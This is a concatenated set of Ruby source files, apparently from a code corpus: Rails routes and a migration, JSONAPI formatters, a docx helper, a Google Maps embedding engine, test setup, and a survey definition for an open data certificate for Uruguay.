file_1 = file_double name: 'file_1', dependency_names: ['file_2'], to_sql: 'file 1'
file_2 = file_double name: 'file_2', dependency_names: ['file_3'], to_sql: 'file 2'
file_3 = file_double name: 'file_3', dependency_names: [], to_sql: 'file 3'
expect(described_class.new([file_1,file_2,file_3]).compile).to eq "file 3;\nfile 2;\nfile 1"
end
it 'raises when a file is missing' do
file_1 = file_double name: 'file_1', dependency_names: ['file_2'], to_sql: 'file 1'
expect do
described_class.new([file_1]).compile
end.to raise_error DBCode::LoadError, 'cannot load file -- file_2'
end
it 'is empty when empty' do
expect(described_class.new({}).to_sql).to eq ''
end
end
| 39.625 | 96 | 0.692114 |
f8345eff4d221eb9c7bcf53f16202e21ad8196d9 | 431 | class MoveTrixEditorValueFromTangibleThingsToActionText < ActiveRecord::Migration[6.1]
def change
Scaffolding::CompletelyConcrete::TangibleThing.find_each do |tangible_thing|
if tangible_thing.trix_editor_value.present?
tangible_thing.update(action_text_value: tangible_thing.trix_editor_value)
end
end
remove_column :scaffolding_completely_concrete_tangible_things, :trix_editor_value
end
end
| 35.916667 | 86 | 0.812065 |
ed6786486fc53319b9e14bc5e47b7793c482bf54 | 3,434 | # rubocop:disable Lint/MissingCopEnableDirective, Metrics/BlockLength
Rails.application.routes.draw do
draw(:old_route_redirects)
ActiveAdmin.routes(self)
require 'sidekiq/web'
authenticate :user, ->(user) { user.admin? } do
mount Sidekiq::Web => '/sidekiq'
end
resource :github_webhooks, only: :create, defaults: { formats: :json }
unauthenticated do
root 'static_pages#home'
end
authenticated :user do
root to: 'users#show', as: :dashboard
end
devise_for :users, controllers: {
registrations: 'registrations',
omniauth_callbacks: 'omniauth_callbacks',
}
devise_scope :user do
get '/login' => 'devise/sessions#new'
get '/logout' => 'devise/sessions#destroy', method: :delete
get 'sign_up' => 'devise/registrations#new'
get 'signup' => 'devise/registrations#new'
get '/confirm_email' => 'users#send_confirmation_link'
end
namespace :api do
resources :lesson_completions, only: [:index]
resources :points, only: %i[index show create]
end
get 'home' => 'static_pages#home'
get 'about' => 'static_pages#about'
get 'faq' => 'static_pages#faq'
get 'contributing' => 'static_pages#contributing'
get 'terms_of_use' => 'static_pages#terms_of_use'
get 'styleguide' => 'static_pages#style_guide'
get 'success_stories' => 'static_pages#success_stories'
get 'community_rules' => 'static_pages#community_rules'
get 'before_asking' => 'static_pages#before_asking'
get 'how_to_ask' => 'static_pages#how_to_ask'
get 'sitemap' => 'sitemap#index', defaults: { format: 'xml' }
  # failure route used when the GitHub information returned is invalid
get '/auth/failure' => 'omniauth_callbacks#failure'
resources :users, only: %i[show update]
namespace :users do
resources :paths, only: :create
resources :progress, only: :destroy
end
# Deprecated Route to Web Development 101 from external links
get '/courses/web-development-101', to: redirect('/courses/foundations')
  get '/courses/web-development-101/:id', to: redirect('/courses/foundations/%{id}')
get '/courses' => redirect('/paths')
namespace :lessons do
resource :preview, only: %i[show create]
resources :installation_lessons, only: %i[index]
end
namespace :courses do
resources :progress, only: %i[show]
end
resources :lessons, only: :show do
resources :project_submissions, only: %i[index], controller: 'lessons/project_submissions'
resources :lesson_completions, only: %i[create], as: 'completions'
delete 'lesson_completions' => 'lesson_completions#destroy', as: 'lesson_completions'
end
resources :project_submissions do
resources :flags, only: %i[create], controller: 'project_submissions/flags'
resources :likes, controller: 'project_submissions/likes'
end
get '/paths/web-development-101', to: redirect('/paths/foundations')
resources :paths, only: %i[index show] do
resources :courses, only: %i[index show] do
resources :lessons, only: %i[show]
end
end
resources :notifications, only: %i[index update]
resource :themes, only: :update
match '/404' => 'errors#not_found', via: %i[get post patch delete]
# Explicitly redirect deprecated routes (301)
get '/courses/curriculum' => redirect('/courses')
get 'curriculum' => redirect('/courses')
get 'scheduler' => redirect('/courses')
get '/tracks', to: redirect('/paths')
get '/tracks/:id', to: redirect('/paths/%{id}')
end
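# Editorial illustration (not part of this file): one way the redirects above
# could be verified in a hypothetical request spec.
#
#   it 'redirects the deprecated foundations path' do
#     get '/paths/web-development-101'
#     expect(response).to redirect_to('/paths/foundations')
#   end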
| 32.396226 | 94 | 0.701514 |
1d0827ba8998d57c3ff7c2d913c2c8fb3c1e8b25 | 2,267 | # encoding: utf-8
module Rack
class Webconsole
# Helper module to encapsulate the asset loading logic used by the {Assets}
# middleware.
#
# For now, the strategy is reading the files from disk. In the future, we
# should come up with a somewhat more sophisticated strategy, although
# {Webconsole} is used only in development environments, where performance
# isn't usually a concern.
#
module AssetHelpers
# Loads the HTML from a file in `/public`.
#
# It contains a form and the needed divs to render the console.
#
# @return [String] the injectable HTML.
def html_code
out = ""
out << asset('jquery.html') if Webconsole.inject_jquery
out << asset('webconsole.html')
out
end
# Loads the CSS from a file in `/public`.
#
# It contains the styles for the console.
#
# @return [String] the injectable CSS.
def css_code
'<style type="text/css">' <<
asset('webconsole.css') <<
'</style>'
end
# Loads the JavaScript from a file in `/public`.
#
# It contains the JavaScript logic of the webconsole.
#
# @return [String] the injectable JavaScript.
def js_code
'<script type="text/javascript">' <<
asset('webconsole.js') <<
'</script>'
end
      # Interpolates the given variables inside the JavaScript code
      #
      # @param [String] javascript The JavaScript code to insert the variables into
      # @param [Hash] variables A hash containing the variable names (as keys)
      #   and their values
#
# @return [String] the javascript code with the interpolated variables
def render(javascript, variables = {})
javascript_with_variables = javascript.dup
variables.each_pair do |variable, value|
javascript_with_variables.gsub!("$#{variable}", value)
end
javascript_with_variables
end
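      # Editorial example (not in the original source): `render` replaces
      # `$name` tokens in the asset with the supplied values.
      #
      #   render("var path = '$path';", 'path' => '/webconsole')
      #   # => "var path = '/webconsole';"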
private
def asset(file)
@assets ||= {}
output = ::File.open(::File.join(::File.dirname(__FILE__), '..', '..', '..', 'public', file), 'r:UTF-8') do |f|
f.read
end
@assets[file] ||= output
end
end
end
end
| 30.635135 | 119 | 0.595942 |
4ac020d5499212d2abd625347526266b93563437 | 2,872 | require 'nokogiri'
require 'docx/elements'
require 'docx/containers'
module Docx
module Elements
module Element
DEFAULT_TAG = ''
# Ensure that a 'tag' corresponding to the XML element that defines the element is defined
def self.included(base)
base.extend(ClassMethods)
base.const_set(:TAG, Element::DEFAULT_TAG) unless base.const_defined?(:TAG)
end
attr_accessor :node
delegate :at_xpath, :xpath, :to => :@node
# TODO: Should create a docx object from this
def parent(type = '*')
@node.at_xpath("./parent::#{type}")
end
# Get parent paragraph of element
def parent_paragraph
Elements::Containers::Paragraph.new(parent('w:p'))
end
# Insertion methods
# Insert node as last child
def append_to(element)
@node = element.node.add_child(@node)
self
end
# Insert node as first child (after properties)
def prepend_to(element)
@node = element.node.properties.add_next_sibling(@node)
self
end
def insert_after(element)
# Returns newly re-parented node
@node = element.node.add_next_sibling(@node)
self
end
def insert_before(element)
@node = element.node.add_previous_sibling(@node)
self
end
# Creation/edit methods
def copy
self.class.new(@node.dup)
end
# A method to wrap content in an HTML tag.
# Currently used in paragraph and text_run for the to_html methods
#
# content:: The base text content for the tag.
# styles:: Hash of the inline CSS styles to be applied. e.g.
# { 'font-size' => '12pt', 'text-decoration' => 'underline' }
#
def html_tag(name, options = {})
content = options[:content]
styles = options[:styles]
html = "<#{name.to_s}"
unless styles.nil? || styles.empty?
styles_array = []
styles.each do |property, value|
next if property == 'font-size'
styles_array << "#{property.to_s}:#{value};"
end
html << " style=\"#{styles_array.join('')}\"" unless styles_array.empty?
end
html << ">"
html << content if content
html << "</#{name.to_s}>"
end
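      # Editorial example (not in the original source): `html_tag` wraps
      # content in a styled tag, dropping any 'font-size' style.
      #
      #   html_tag(:span, content: 'Hi',
      #            styles: { 'font-style' => 'italic', 'font-size' => '12pt' })
      #   # => "<span style=\"font-style:italic;\">Hi</span>"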
module ClassMethods
def create_with(element)
# Need to somehow get the xml document accessible here by default, but this is alright in the interim
self.new(Nokogiri::XML::Node.new("w:#{self.tag}", element.node))
end
def create_within(element)
new_element = create_with(element)
new_element.append_to(element)
new_element
end
end
end
end
end
| 29.306122 | 112 | 0.571379 |
7a6dddd26d99107322cf3681048c06d9bf664cfd | 142 | class AddProfileToShirts < ActiveRecord::Migration
def change
add_reference :shirts, :profile, index: true, foreign_key: true
end
end
| 23.666667 | 67 | 0.767606 |
5df108da2a018a69e0efe67dc71d0d30de766503 | 478 | require 'stringio'
module Puppet::Parser::Functions
newfunction(:generate_options, type: :rvalue) do |args|
    options = args[0]
    return '' if options.empty?
buffer = StringIO.new
buffer << "options {\n"
indent = ' '
options.keys.sort.each do |option|
value = options[option]
buffer << indent
buffer << option
buffer << '('
buffer << value
buffer << ");\n"
end
buffer << "};\n"
buffer.string
end
end
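# Editorial illustration (not part of the source): given a hash such as
# { 'flush_lines' => '0', 'use_dns' => 'no' }, the function above returns a
# syslog-ng style options block, with each line prefixed by `indent`:
#
#   options {
#     flush_lines(0);
#     use_dns(no);
#   };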
| 19.916667 | 57 | 0.575314 |
183321c9b7a3897c9040915f3c396b098fe7942e | 230 | # frozen_string_literal: true
require './lib/todoable'
require 'minitest/autorun'
require 'webmock/minitest'
require 'vcr'
require 'pry'
VCR.configure do |c|
c.cassette_library_dir = "test/fixtures"
c.hook_into :webmock
end | 19.166667 | 42 | 0.76087 |
6a3f8c95cdfb1e945603f8600188259f7683ac07 | 356 | require "indicator.rb"
ActionView::Base.send(:include, Indicator::InstanceMethods)
# install files
%w[/public/images /public/javascripts /public/stylesheets].each{|dir|
source = File.join(directory,dir)
dest = RAILS_ROOT + dir
FileUtils.cp_r(Dir.glob(source+'/*.*'), dest)
} unless File.exists?(RAILS_ROOT + '/public/images/indicator.gif')
| 35.6 | 70 | 0.719101 |
ed1a07e24bafa327a3b84ba2337bc15fbb52687f | 152 | require 'test_helper'
module EventLogger
class EventTest < ActiveSupport::TestCase
# test "the truth" do
# assert true
# end
end
end
| 15.2 | 43 | 0.677632 |
e9fca6e3abb59eab298e07f0d792cfebc8a29be7 | 1,344 | require_relative '../../spec_helper'
require_relative 'fixtures/classes'
describe "Kernel.binding" do
it "returns a binding for the caller" do
Kernel.binding.eval("self").should == self
end
end
describe "Kernel#binding" do
it "is a private method" do
Kernel.should have_private_instance_method(:binding)
end
before :each do
@b1 = KernelSpecs::Binding.new(99).get_binding
ScratchPad.clear
end
it "returns a Binding object" do
@b1.kind_of?(Binding).should == true
end
it "encapsulates the execution context properly" do
eval("@secret", @b1).should == 100
eval("a", @b1).should == true
eval("b", @b1).should == true
eval("@@super_secret", @b1).should == "password"
eval("square(2)", @b1).should == 4
eval("self.square(2)", @b1).should == 4
eval("a = false", @b1)
eval("a", @b1).should == false
end
it "raises a NameError on undefined variable" do
lambda { eval("a_fake_variable", @b1) }.should raise_error(NameError)
end
it "uses the closure's self as self in the binding" do
m = mock(:whatever)
eval('self', m.send(:binding)).should == self
end
it "uses the class as self in a Class.new block" do
m = mock(:whatever)
cls = Class.new { ScratchPad.record eval('self', m.send(:binding)) }
ScratchPad.recorded.should == cls
end
end
| 25.846154 | 73 | 0.65625 |
913dea7615c7a8027b88d1eda24ab6f59b1fb234 | 188 | class ChangeTypeNameFieldToString < ActiveRecord::Migration
def change
remove_column :quotation_prices, :name
add_column :quotation_prices, :name, :string, default: ""
end
end
| 26.857143 | 61 | 0.765957 |
6a82cb9fabb3571ffa6c7b04f2b1d7ad6e32a631 | 53 | module SqlOptimizer
VERSION = '0.1.3'.freeze
end
| 8.833333 | 26 | 0.698113 |
4aa2cd6c5f58efaac3c9cea3061791730a2cd6ea | 1,894 | module JSONAPI
class Formatter
class << self
def format(arg)
arg.to_s
end
def unformat(arg)
arg
end
# :nocov:
if RUBY_VERSION >= '2.0'
def formatter_for(format)
formatter_class_name = "#{format.to_s.camelize}Formatter"
Object.const_get formatter_class_name if formatter_class_name
end
else
def formatter_for(format)
formatter_class_name = "#{format.to_s.camelize}Formatter"
formatter_class_name.safe_constantize if formatter_class_name
end
end
# :nocov:
end
end
class KeyFormatter < Formatter
class << self
def format(key)
super
end
def unformat(formatted_key)
super.to_sym
end
end
end
class ValueFormatter < Formatter
class << self
def format(raw_value, context)
super(raw_value)
end
def unformat(value, context)
super(value)
end
def value_formatter_for(type)
formatter_name = "#{type.to_s.camelize}Value"
formatter_for(formatter_name)
end
end
end
end
class UnderscoredKeyFormatter < JSONAPI::KeyFormatter
end
class CamelizedKeyFormatter < JSONAPI::KeyFormatter
class << self
def format(key)
super.camelize(:lower)
end
def unformat(formatted_key)
formatted_key.to_s.underscore.to_sym
end
end
end
class DasherizedKeyFormatter < JSONAPI::KeyFormatter
class << self
def format(key)
super.dasherize
end
def unformat(formatted_key)
formatted_key.to_s.underscore.to_sym
end
end
end
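# Editorial illustration (not from the source): the key formatters round-trip
# between Ruby symbols and JSON API-style member names (camelize/underscore/
# dasherize come from ActiveSupport).
#
#   CamelizedKeyFormatter.format(:primary_author)    # => "primaryAuthor"
#   CamelizedKeyFormatter.unformat("primaryAuthor")  # => :primary_author
#   DasherizedKeyFormatter.format(:primary_author)   # => "primary-author"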
class DefaultValueFormatter < JSONAPI::ValueFormatter
class << self
def format(raw_value, context)
case raw_value
when String, Integer
return raw_value
else
return raw_value.to_s
end
end
end
end | 19.729167 | 71 | 0.635692 |
acc054eb9ed8ec6a0331061e39adc9502429326c | 6,683 | module Onebox
module Engine
class GoogleMapsOnebox
include Engine
class << self
def ===(other)
if other.kind_of? URI
@@matchers && @@matchers.any? { |m| other.to_s =~ m[:regexp] }
else
super
end
end
private
def matches_regexp(key, regexp)
(@@matchers ||= []) << { key: key, regexp: regexp }
end
end
always_https
# Matches shortened Google Maps URLs
matches_regexp :short, %r"^(https?:)?//goo\.gl/maps/"
# Matches URLs for custom-created maps
matches_regexp :custom, %r"^(?:https?:)?//www\.google(?:\.(?:\w{2,}))+/maps/d/(?:edit|viewer|embed)\?mid=.+$"
# Matches URLs with streetview data
matches_regexp :streetview, %r"^(?:https?:)?//www\.google(?:\.(?:\w{2,}))+/maps[^@]+@(?<lon>-?[\d.]+),(?<lat>-?[\d.]+),(?:\d+)a,(?<zoom>[\d.]+)y,(?<heading>[\d.]+)h,(?<pitch>[\d.]+)t.+?data=.*?!1s(?<pano>[^!]{22})"
# Matches "normal" Google Maps URLs with arbitrary data
matches_regexp :standard, %r"^(?:https?:)?//www\.google(?:\.(?:\w{2,}))+/maps"
# Matches URLs for the old Google Maps domain which we occasionally get redirected to
matches_regexp :canonical, %r"^(?:https?:)?//maps\.google(?:\.(?:\w{2,}))+/maps\?"
def initialize(url, cache = nil, timeout = nil)
super
resolve_url!
rescue Net::HTTPServerException, Timeout::Error, Net::HTTPError, Errno::ECONNREFUSED, RuntimeError => err
raise ArgumentError, "malformed url or unresolveable: #{err.message}"
end
def streetview?
!!@streetview
end
def to_html
"<div class='maps-onebox'><iframe src=\"#{link}\" width=\"690\" height=\"400\" frameborder=\"0\" style=\"border:0\">#{placeholder_html}</iframe></div>"
end
def placeholder_html
width = @placeholder_width || 690
height = @placeholder_height || 400
"<img src='#{@placeholder}' width='#{width}' height='#{height}'/>"
end
private
def data
{ link: url, title: url }
end
def resolve_url!
@streetview = false
type, match = match_url
# Resolve shortened URL, if necessary
if type == :short
follow_redirect!
type, match = match_url
end
# Try to get the old-maps URI, it is far easier to embed.
if type == :standard
retry_count = 10
while (retry_count -= 1) > 0
follow_redirect!
type, match = match_url
break if type != :standard
sleep 0.1
end
end
case type
when :standard
# Fallback for map URLs that don't resolve into an easily embeddable old-style URI
        # Roadmaps use a "z" zoom level; satellite maps use "m", the horizontal width in meters
# TODO: tilted satellite maps using "a,y,t"
match = @url.match(/@(?<lon>[\d.-]+),(?<lat>[\d.-]+),(?<zoom>\d+)(?<mz>[mz])/)
raise "unexpected standard url #{@url}" unless match
zoom = match[:mz] == "z" ? match[:zoom] : Math.log2(57280048.0 / match[:zoom].to_f).round
location = "#{match[:lon]},#{match[:lat]}"
url = "https://maps.google.com/maps?ll=#{location}&z=#{zoom}&output=embed&dg=ntvb"
url += "&q=#{$1}" if match = @url.match(/\/place\/([^\/\?]+)/)
url += "&cid=#{($1 + $2).to_i(16)}" if @url.match(/!3m1!1s0x(\h{16}):0x(\h{16})/)
@url = url
@placeholder = "https://maps.googleapis.com/maps/api/staticmap?maptype=roadmap¢er=#{location}&zoom=#{zoom}&size=690x400&sensor=false"
when :custom
url = @url.dup
@url = rewrite_custom_url(url, "embed")
@placeholder = rewrite_custom_url(url, "thumbnail")
@placeholder_height = @placeholder_width = 120
when :streetview
@streetview = true
panoid = match[:pano]
lon = match[:lon].to_f.to_s
lat = match[:lat].to_f.to_s
heading = match[:heading].to_f.round(4).to_s
pitch = (match[:pitch].to_f / 10.0).round(4).to_s
fov = (match[:zoom].to_f / 100.0).round(4).to_s
zoom = match[:zoom].to_f.round
@url = "https://www.google.com/maps/embed?pb=!3m2!2sen!4v0!6m8!1m7!1s#{panoid}!2m2!1d#{lon}!2d#{lat}!3f#{heading}!4f#{pitch}!5f#{fov}"
@placeholder = "https://maps.googleapis.com/maps/api/streetview?size=690x400&location=#{lon},#{lat}&pano=#{panoid}&fov=#{zoom}&heading=#{heading}&pitch=#{pitch}&sensor=false"
when :canonical
uri = URI(@url)
query = URI::decode_www_form(uri.query).to_h
if !query.has_key?("ll")
raise ArgumentError, "canonical url lacks location argument" unless query.has_key?("sll")
query["ll"] = query["sll"]
@url += "&ll=#{query["sll"]}"
end
location = query["ll"]
if !query.has_key?("z")
raise ArgumentError, "canonical url has incomplete query arguments" unless query.has_key?("spn") || query.has_key?("sspn")
if !query.has_key?("spn")
query["spn"] = query["sspn"]
@url += "&spn=#{query["sspn"]}"
end
angle = query["spn"].split(",").first.to_f
zoom = (Math.log(690.0 * 360.0 / angle / 256.0) / Math.log(2)).round
else
zoom = query["z"]
end
@url = @url.sub('output=classic', 'output=embed')
@placeholder = "https://maps.googleapis.com/maps/api/staticmap?maptype=roadmap&size=690x400&sensor=false¢er=#{location}&zoom=#{zoom}"
else
raise "unexpected url type #{type.inspect}"
end
end
def match_url
@@matchers.each do |matcher|
if m = matcher[:regexp].match(@url)
return matcher[:key], m
end
end
raise ArgumentError, "\"#{@url}\" does not match any known pattern"
end
def rewrite_custom_url(url, target)
uri = URI(url)
uri.path = uri.path.sub(/(?<=^\/maps\/d\/)\w+$/, target)
uri.to_s
end
def follow_redirect!
uri = URI(@url)
begin
http = Net::HTTP.start(uri.host, uri.port,
use_ssl: uri.scheme == 'https', open_timeout: timeout, read_timeout: timeout)
response = http.head(uri.path)
raise "unexpected response code #{response.code}" unless %w(301 302).include?(response.code)
@url = response["Location"]
ensure
http.finish rescue nil
end
end
end
end
end
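# Editorial usage sketch (not part of the source): the engine claims Google
# Maps URLs via the matchers above and renders an embeddable iframe. The URL
# below is a made-up example, and constructing the engine performs HTTP
# requests to resolve it.
#
#   url = "https://www.google.co.uk/maps/@51.5007,-0.1246,15z"
#   Onebox::Engine::GoogleMapsOnebox === URI(url)      # => true
#   Onebox::Engine::GoogleMapsOnebox.new(url).to_html  # => "<div class='maps-onebox'>..."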
| 37.127778 | 220 | 0.546611 |
ab09f41612313913f1f80fbc521b5376711af842 | 140,382 | survey 'UY',
:full_title => 'Uruguay',
:default_mandatory => 'false',
:status => 'alpha',
:description => '<p><strong>This has been generated based on a default and needs to be localised for Uruguay. Please help us! Contact <a href="mailto:[email protected]">[email protected]</a></strong></p><p>This self-assessment questionnaire generates an open data certificate and badge you can publish to tell people all about this open data. We also use your answers to learn how organisations publish open data.</p><p>When you answer these questions it demonstrates your efforts to comply with relevant legislation. You should also check which other laws and policies apply to your sector.</p><p><strong>You do not need to answer all the questions to get a certificate.</strong> Just answer those you can.</p>' do
translations :en => :default
section_general 'General Information',
:description => '',
:display_header => false do
q_dataTitle 'What\'s this data called?',
:discussion_topic => :dataTitle,
:help_text => 'People see the name of your open data in a list of similar ones so make this as unambiguous and descriptive as you can in this tiny box so they quickly identify what\'s unique about it.',
:required => :required
a_1 'Data Title',
:string,
:placeholder => 'Data Title',
:required => :required
q_documentationUrl 'Where is it described?',
:discussion_topic => :documentationUrl,
:display_on_certificate => true,
:text_as_statement => 'This data is described at',
:help_text => 'Give a URL for people to read about the contents of your open data and find more detail. It can be a page within a bigger catalog like data.gov.uk.'
a_1 'Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Documentation URL',
:requirement => ['pilot_1', 'basic_1']
label_pilot_1 'You should have a <strong>web page that offers documentation</strong> about the open data you publish so that people can understand its context, content and utility.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_1'
dependency :rule => 'A and B'
condition_A :q_releaseType, '!=', :a_collection
condition_B :q_documentationUrl, '==', {:string_value => '', :answer_reference => '1'}
label_basic_1 'You must have a <strong>web page that gives documentation</strong> and access to the open data you publish so that people can use it.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_1'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_collection
condition_B :q_documentationUrl, '==', {:string_value => '', :answer_reference => '1'}
q_publisher 'Who publishes this data?',
:discussion_topic => :publisher,
:display_on_certificate => true,
:text_as_statement => 'This data is published by',
:help_text => 'Give the name of the organisation who publishes this data. It’s probably who you work for unless you’re doing this on behalf of someone else.',
:required => :required
a_1 'Data Publisher',
:string,
:placeholder => 'Data Publisher',
:required => :required
q_publisherUrl 'What website is the data published on?',
:discussion_topic => :publisherUrl,
:display_on_certificate => true,
:text_as_statement => 'The data is published on',
:help_text => 'Give a URL to a website, this helps us to group data from the same organisation even if people give different names.'
a_1 'Publisher URL',
:string,
:input_type => :url,
:placeholder => 'Publisher URL'
q_releaseType 'What kind of release is this?',
:discussion_topic => :releaseType,
:pick => :one,
:required => :required
a_oneoff 'a one-off release of a single dataset',
:help_text => 'This is a single file and you don’t currently plan to publish similar files in the future.'
a_collection 'a one-off release of a set of related datasets',
:help_text => 'This is a collection of related files about the same data and you don’t currently plan to publish similar collections in the future.'
a_series 'ongoing release of a series of related datasets',
:help_text => 'This is a sequence of datasets with planned periodic updates in the future.'
a_service 'a service or API for accessing open data',
:help_text => 'This is a live web service that exposes your data to programmers through an interface they can query.'
end
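  # Editorial note (not part of the generated questionnaire): throughout this
  # survey, follow-up questions are shown conditionally via lettered rules,
  # e.g. a question asked only for ongoing series releases would be declared:
  #
  #   dependency :rule => 'A'
  #   condition_A :q_releaseType, '==', :a_series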
section_legal 'Legal Information',
:description => 'Rights, licensing and privacy' do
label_group_2 'Rights',
:help_text => 'your right to share this data with people',
:customer_renderer => '/partials/fieldset'
q_publisherRights 'Do you have the rights to publish this data as open data?',
:discussion_topic => :uy_publisherRights,
:help_text => 'If your organisation didn\'t originally create or gather this data then you might not have the right to publish it. If you’re not sure, check with the data owner because you will need their permission to publish it.',
:requirement => ['basic_2'],
:pick => :one,
:required => :required
a_yes 'yes, you have the rights to publish this data as open data',
:requirement => ['standard_1']
a_no 'no, you don\'t have the rights to publish this data as open data'
a_unsure 'you\'re not sure if you have the rights to publish this data as open data'
a_complicated 'the rights in this data are complicated or unclear'
label_standard_1 'You should have a <strong>clear legal right to publish this data</strong>.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_1'
dependency :rule => 'A'
condition_A :q_publisherRights, '!=', :a_yes
label_basic_2 'You must have the <strong>right to publish this data</strong>.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_2'
dependency :rule => 'A'
condition_A :q_publisherRights, '==', :a_no
q_rightsRiskAssessment 'Where do you detail the risks people might encounter if they use this data?',
:discussion_topic => :uy_rightsRiskAssessment,
:display_on_certificate => true,
:text_as_statement => 'Risks in using this data are described at',
:help_text => 'It can be risky for people to use data without a clear legal right to do so. For example, the data might be taken down in response to a legal challenge. Give a URL for a page that describes the risk of using this data.'
dependency :rule => 'A'
condition_A :q_publisherRights, '==', :a_complicated
a_1 'Risk Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Risk Documentation URL',
:requirement => ['pilot_2']
label_pilot_2 'You should document <strong>risks associated with using this data</strong>, so people can work out how they want to use it.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_2'
dependency :rule => 'A and B'
condition_A :q_publisherRights, '==', :a_complicated
condition_B :q_rightsRiskAssessment, '==', {:string_value => '', :answer_reference => '1'}
q_publisherOrigin 'Was <em>all</em> this data originally created or gathered by you?',
:discussion_topic => :uy_publisherOrigin,
:display_on_certificate => true,
:text_as_statement => 'This data was',
:help_text => 'If any part of this data was sourced outside your organisation by other individuals or organisations then you need to give extra information about your right to publish it.',
:pick => :one,
:required => :required
dependency :rule => '(A or B)'
condition_A :q_publisherRights, '==', :a_yes
condition_B :q_publisherRights, '==', :a_unsure
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'originally created or generated by its curator'
q_thirdPartyOrigin 'Was some of this data extracted or calculated from other data?',
:discussion_topic => :uy_thirdPartyOrigin,
:help_text => 'An extract or smaller part of someone else\'s data still means your rights to use it might be affected. There might also be legal issues if you analysed their data to produce new results from it.',
:pick => :one,
:required => :required
dependency :rule => 'A and B'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
a_false 'no'
a_true 'yes',
:requirement => ['basic_3']
label_basic_3 'You indicated that this data wasn\'t originally created or gathered by you, and wasn\'t crowdsourced, so it must have been extracted or calculated from other data sources.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_3'
dependency :rule => 'A and B and C and D'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_crowdsourced, '==', :a_false
condition_D :q_thirdPartyOrigin, '!=', :a_true
q_thirdPartyOpen 'Are <em>all</em> sources of this data already published as open data?',
:discussion_topic => :uy_thirdPartyOpen,
:display_on_certificate => true,
:text_as_statement => 'This data is created from',
:help_text => 'You\'re allowed to republish someone else\'s data if it\'s already under an open data licence or if their rights have expired or been waived. If any part of this data is not like this then you\'ll need legal advice before you can publish it.',
:pick => :one,
:required => :required
dependency :rule => 'A and B and C'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_thirdPartyOrigin, '==', :a_true
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'open data sources',
:requirement => ['basic_4']
label_basic_4 'You should get <strong>legal advice to make sure you have the right to publish this data</strong>.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_4'
dependency :rule => 'A and B and C and D and E'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_thirdPartyOrigin, '==', :a_true
condition_D :q_thirdPartyOpen, '==', :a_false
condition_E :q_thirdPartyOpen, '==', :a_false
q_crowdsourced 'Was some of this data crowdsourced?',
:discussion_topic => :uy_crowdsourced,
:display_on_certificate => true,
:text_as_statement => 'Some of this data is',
:help_text => 'If the data includes information contributed by people outside your organisation, you need their permission to publish their contributions as open data.',
:pick => :one,
:required => :required
dependency :rule => 'A and B'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'crowdsourced',
:requirement => ['basic_5']
label_basic_5 'You indicated that the data wasn\'t originally created or gathered by you, and wasn\'t extracted or calculated from other data, so it must have been crowdsourced.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_5'
dependency :rule => 'A and B and C and D'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_thirdPartyOrigin, '==', :a_false
condition_D :q_crowdsourced, '!=', :a_true
q_crowdsourcedContent 'Did contributors to this data use their judgement?',
:discussion_topic => :uy_crowdsourcedContent,
:help_text => 'If people used their creativity or judgement to contribute data then they have copyright over their work. For example, writing a description or deciding whether or not to include some data in a dataset would require judgement. So contributors must transfer or waive their rights, or license the data to you before you can publish it.',
:pick => :one,
:required => :required
dependency :rule => 'A and B and C'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_crowdsourced, '==', :a_true
a_false 'no'
a_true 'yes'
q_claUrl 'Where is the Contributor Licence Agreement (CLA)?',
:discussion_topic => :uy_claUrl,
:display_on_certificate => true,
:text_as_statement => 'The Contributor Licence Agreement is at',
:help_text => 'Give a link to an agreement that shows contributors allow you to reuse their data. A CLA will either transfer contributor\'s rights to you, waive their rights, or license the data to you so you can publish it.',
:help_text_more_url => 'http://en.wikipedia.org/wiki/Contributor_License_Agreement',
:required => :required
dependency :rule => 'A and B and C and D'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_crowdsourced, '==', :a_true
condition_D :q_crowdsourcedContent, '==', :a_true
a_1 'Contributor Licence Agreement URL',
:string,
:input_type => :url,
:placeholder => 'Contributor Licence Agreement URL',
:required => :required
q_cldsRecorded 'Have all contributors agreed to the Contributor Licence Agreement (CLA)?',
:discussion_topic => :uy_cldsRecorded,
:help_text => 'Check all contributors agree to a CLA before you reuse or republish their contributions. You should keep a record of who gave contributions and whether or not they agree to the CLA.',
:pick => :one,
:required => :required
dependency :rule => 'A and B and C and D'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_crowdsourced, '==', :a_true
condition_D :q_crowdsourcedContent, '==', :a_true
a_false 'no'
a_true 'yes',
:requirement => ['basic_6']
label_basic_6 'You must get <strong>contributors to agree to a Contributor Licence Agreement</strong> (CLA) that gives you the right to publish their work as open data.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_6'
dependency :rule => 'A and B and C and D and E'
condition_A :q_publisherRights, '==', :a_unsure
condition_B :q_publisherOrigin, '==', :a_false
condition_C :q_crowdsourced, '==', :a_true
condition_D :q_crowdsourcedContent, '==', :a_true
condition_E :q_cldsRecorded, '==', :a_false
